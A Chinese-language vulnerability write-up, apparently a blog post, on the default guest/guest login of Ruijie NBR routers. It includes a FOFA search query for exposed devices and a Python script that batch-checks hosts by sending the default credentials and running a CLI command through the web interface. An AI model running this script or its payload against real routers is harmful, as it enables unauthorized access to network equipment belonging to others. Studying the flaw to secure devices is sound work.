锐捷NBR路由器存在弱口令漏洞

简介: 锐捷NBR路由器存在弱口令漏洞

漏洞简介

锐捷网络股份有限公司是一家数据通信解决方案提供商。
锐捷网络股份有限公司NBR路由器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。

漏洞影响

NBR路由器

漏洞复现

百度上查询到NBR路由器的默认账号密码为guest/guest

91179e7b11ccd65c958c87ed98dd96e7.png

在NBR后台管理界面使用默认账号密码成功登录后台

feefba9d878be6dff46ec5d753fd6c47.png

poc

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
import sys
import argparse
def lemonlove7():
    print('FOFA:title="锐捷网络--NBR路由器--登录界面"')
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file xxx.txt')
    print('lemonlove7')
if len(sys.argv) == 1:
    lemonlove7()
    sys.exit()
par = argparse.ArgumentParser(description='lemonlove7 help')
par.add_argument('-u','--url' ,help='输入url',default='')
par.add_argument('-f','--file',help='输入文件',default='')
a = par.parse_args()
url =a.url
file =a.file
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'text/plain;charset=UTF-8',
    'Cookie':'c_name=; hardtype=NBR2000G; web-coding=gb2312; currentURL=; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest',
    'Authorization':'Basic Z3Vlc3Q6Z3Vlc3Q='
}
data = 'command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.'
if url != '':
    url = url
    url2 =url
    try:
        url1 =url+'/WEB_VMS/LEVEL15/'
        r =requests.post(url=url1 , data=data,headers=headers,verify=False,timeout=10)
        #print(r.text)
        if r.status_code == 200 and 'WebCLI' in r.text:
            print(url2+'NBR路由器存在弱口令:guest/guest')
        else:
            print(url2+'NBR路由器不存在弱口令')
    except Exception as e:
        print(url2+'异常')
if file != '':
    p = open(file,'r+')
    for i in p.readlines():
        url = i.strip()
        if url.startswith('http://') != 1 and url.startswith('https://') != 1:
            url = 'http://'+url
        url=url
        url1=url
        #print(url)
        try:
            url = url +'/WEB_VMS/LEVEL15/'
            r=requests.post(url=url,headers=headers,data=data,verify=False,timeout=10)
            if r.status_code == 200 and 'WebCLI' in r.text:
                print(url1+'NBR路由器存在弱口令:guest/guest')
            else:
                print(url1+'NBR路由器不存在弱口令')
        except Exception as e:
            print(url1+'异常')

运行效果如下:

单个检测:

640.png

批量检测:

640.png

相关文章
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
17252 0
|
NoSQL 安全 MongoDB
MongoDB 未授权访问漏洞利用
MongoDB 未授权访问漏洞利用
2402 0
|
安全 数据安全/隐私保护 Windows
【内网渗透】神器Mimikatz的入门简单实践
【内网渗透】神器Mimikatz的入门简单实践
1562 0
【内网渗透】神器Mimikatz的入门简单实践
|
安全 数据库
Elasticsearch未授权访问漏洞
  Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.
13923 1
|
存储 域名解析 供应链
阿里云 OSS对象存储攻防
本文分为两个部分 第一部分介绍OSS对象存储攻防的方式 第二部分为真实漏洞案例
3329 0
阿里云 OSS对象存储攻防
|
8月前
|
人工智能 安全 数据库
AiCodeAudit-基于Ai大模型的自动代码审计工具
本文介绍了基于OpenAI大模型的自动化代码安全审计工具AiCodeAudit,通过图结构构建项目依赖关系,提高代码审计准确性。文章涵盖概要、整体架构流程、技术名词解释及效果演示,详细说明了工具的工作原理和使用方法。未来,AI大模型有望成为代码审计的重要工具,助力软件安全。项目地址:[GitHub](https://github.com/xy200303/AiCodeAudit)。
|
安全 网络虚拟化 数据安全/隐私保护
Windows 10系统自带VPN客户端配置连接PPTP VPN服务器
Windows 10系统自带VPN客户端配置连接PPTP VPN服务器
6429 1
|
存储 安全 PHP
不知几DAY的Symfony---RCE复现
Symfony是一个开源的PHP Web框架,它现在是许多知名 CMS 的核心组件,例如Drupal、Joomla! 此文演示了该框架存在的一个RCE漏洞
不知几DAY的Symfony---RCE复现
|
安全 NoSQL 关系型数据库
内网扫描器Fscan
内网扫描器Fscan
|
安全 前端开发 JavaScript